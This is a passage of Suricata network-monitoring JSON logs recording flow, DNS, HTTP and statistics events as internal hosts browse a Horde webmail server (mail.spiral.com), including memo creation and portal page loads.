Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5607}} {"timestamp":"2020-02-29T00:12:21.000501+0000","flow_id":1599723571538018,"event_type":"flow","src_ip":"192.168.10.122","src_port":58451,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:07:20.223330+0000","end":"2020-02-29T00:07:20.332082+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:23.000191+0000","event_type":"stats","stats":{"uptime":14395,"capture":{"kernel_packets":134911,"kernel_drops":0},"decoder":{"pkts":134924,"bytes":93010920,"invalid":187,"ipv4":133435,"ipv6":8,"ethernet":134924,"raw":0,"null":0,"sll":0,"tcp":128167,"udp":5066,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2755,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2771,"synack":2762,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1796,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2313,"failed_udp":111},"tx":{"http":4623,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2393}},"flow_mgr":{"closed_pruned":2
731,"new_pruned":15,"est_pruned":2362,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20828,"memcap_state":0,"memcap_global":0},"http":{"memuse":76404,"memcap":0}}} {"timestamp":"2020-02-29T00:12:23.000978+0000","flow_id":1157088548497515,"event_type":"flow","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":27,"pkts_toclient":35,"bytes_toserver":4407,"bytes_toclient":36375,"start":"2020-02-29T00:10:16.600171+0000","end":"2020-02-29T00:11:22.851541+0000","age":66,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:23.001319+0000","flow_id":110654126986856,"event_type":"flow","src_ip":"192.168.10.130","src_port":34788,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1276,"bytes_toclient":956,"start":"2020-02-29T00:10:22.824936+0000","end":"2020-02-29T00:11:22.851474+0000","age":60,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:12:25.000815+0000","flow_id":1212171508187051,"event_type":"flow","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":14,"bytes_toserver":2320,"bytes_toclient":11299,"start":"2020-02-29T00:11:18.851883+0000","end":"2020-02-29T00:11:24.439161+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:25.801798+0000","flow_id":1144822130078229,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34806,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5607},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20704,"tx_id":0}} {"timestamp":"2020-02-29T00:12:27.645979+0000","flow_id":1565664501029723,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42020,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54334,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:27.754252+0000","flow_id":1565664501029723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42020,"proto":"UDP","dns":{"type":"answer","id":54334,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:12:27.754252+0000","flow_id":1565664501029723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42020,"proto":"UDP","dns":{"type":"answer","id":54334,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:27.914566+0000","flow_id":204108328578649,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34808,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6663}} {"timestamp":"2020-02-29T00:12:30.000234+0000","event_type":"stats","stats":{"uptime":14402,"capture":{"kernel_packets":134931,"kernel_drops":0},"decoder":{"pkts":134947,"bytes":93020018,"invalid":187,"ipv4":133456,"ipv6":8,"ethernet":134947,"raw":0,"null":0,"sll":0,"tcp":128186,"udp":5068,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2756,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2772,"synack":2763,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"htt
p":1797,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2314,"failed_udp":111},"tx":{"http":4624,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2394}},"flow_mgr":{"closed_pruned":2734,"new_pruned":15,"est_pruned":2363,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21159,"memcap_state":0,"memcap_global":0},"http":{"memuse":111087,"memcap":0}}} {"timestamp":"2020-02-29T00:12:30.444193+0000","flow_id":1009264372926241,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50814,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50639,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:30.552573+0000","flow_id":1009264372926241,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50814,"proto":"UDP","dns":{"type":"answer","id":50639,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:30.552573+0000","flow_id":1009264372926241,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50814,"proto":"UDP","dns":{"type":"answer","id":50639,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:30.573910+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 
(KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:12:30.573910+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:12:32.000671+0000","flow_id":1771509394621068,"event_type":"flow","src_ip":"192.168.10.81","src_port":52722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1110,"start":"2020-02-29T00:11:26.508556+0000","end":"2020-02-29T00:11:31.703191+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:12:32.915744+0000","flow_id":204108328578649,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34808,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6663},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":31984,"tx_id":0}} {"timestamp":"2020-02-29T00:12:34.485767+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34810,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:12:34.494123+0000","flow_id":1661936193407531,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39806,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:12:34.602655+0000","flow_id":1661936193407531,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56201,"proto":"UDP","dns":{"type":"answer","id":39806,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:34.602655+0000","flow_id":1661936193407531,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56201,"proto":"UDP","dns":{"type":"answer","id":39806,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:34.669166+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:12:34.669166+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":204,"tx_id":1}} {"timestamp":"2020-02-29T00:12:34.681377+0000","flow_id":964081317209505,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58854,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6800,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:34.789685+0000","flow_id":964081317209505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58854,"proto":"UDP","dns":{"type":"answer","id":6800,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:34.789685+0000","flow_id":964081317209505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58854,"proto":"UDP","dns":{"type":"answer","id":6800,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:34.913434+0000","flow_id":1937329496453146,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38808,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49577,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:34.923749+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu 
Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5240}} {"timestamp":"2020-02-29T00:12:35.000171+0000","flow_id":563408108453862,"event_type":"flow","src_ip":"192.168.10.130","src_port":34794,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:11:22.851942+0000","end":"2020-02-29T00:11:34.022594+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:35.000374+0000","flow_id":23852826892732,"event_type":"flow","src_ip":"192.168.10.122","src_port":43605,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:07:34.399804+0000","end":"2020-02-29T00:07:34.508268+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:35.000459+0000","flow_id":746339340518905,"event_type":"flow","src_ip":"192.168.10.122","src_port":54527,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:07:34.656889+0000","end":"2020-02-29T00:07:34.764835+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:12:35.022032+0000","flow_id":1937329496453146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38808,"proto":"UDP","dns":{"type":"answer","id":49577,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:35.022032+0000","flow_id":1937329496453146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38808,"proto":"UDP","dns":{"type":"answer","id":49577,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:35.103290+0000","flow_id":454818455014582,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34812,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4819}} 
{"timestamp":"2020-02-29T00:12:37.000149+0000","event_type":"stats","stats":{"uptime":14409,"capture":{"kernel_packets":134980,"kernel_drops":0},"decoder":{"pkts":134986,"bytes":93032192,"invalid":187,"ipv4":133495,"ipv6":8,"ethernet":134986,"raw":0,"null":0,"sll":0,"tcp":128217,"udp":5076,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2758,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2774,"synack":2765,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1798,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2318,"failed_udp":111},"tx":{"http":4628,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2398}},"flow_mgr":{"closed_pruned":2735,"new_pruned":15,"est_pruned":2363,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21823,"memcap_state":0,"memcap_global":0},"http":{"memuse":128024,"memcap":0}}} 
{"timestamp":"2020-02-29T00:12:38.000534+0000","flow_id":146057546899732,"event_type":"flow","src_ip":"192.168.10.130","src_port":34796,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1149,"bytes_toclient":7663,"start":"2020-02-29T00:11:31.729364+0000","end":"2020-02-29T00:11:37.019380+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:38.435589+0000","flow_id":2162338538366341,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38589,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54557,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:38.543962+0000","flow_id":2162338538366341,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38589,"proto":"UDP","dns":{"type":"answer","id":54557,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:38.543962+0000","flow_id":2162338538366341,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38589,"proto":"UDP","dns":{"type":"answer","id":54557,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:38.698958+0000","flow_id":931899127526949,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7922}} {"timestamp":"2020-02-29T00:12:39.885858+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34810,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5240},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":24332,"tx_id":2}} {"timestamp":"2020-02-29T00:12:40.104202+0000","flow_id":454818455014582,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34812,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4819},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":20386,"tx_id":0}} 
{"timestamp":"2020-02-29T00:12:41.000689+0000","flow_id":128482540935253,"event_type":"flow","src_ip":"192.168.10.130","src_port":34798,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1291,"bytes_toclient":8021,"start":"2020-02-29T00:11:34.022613+0000","end":"2020-02-29T00:11:40.125961+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:43.700464+0000","flow_id":931899127526949,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52732,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7922},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44805,"tx_id":0}} {"timestamp":"2020-02-29T00:12:43.898656+0000","flow_id":1915120221140576,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34113,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54857,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
